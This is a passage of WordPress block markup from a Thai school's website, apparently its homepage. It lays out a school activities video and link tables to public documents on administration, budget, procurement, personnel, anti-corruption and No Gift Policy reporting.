wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 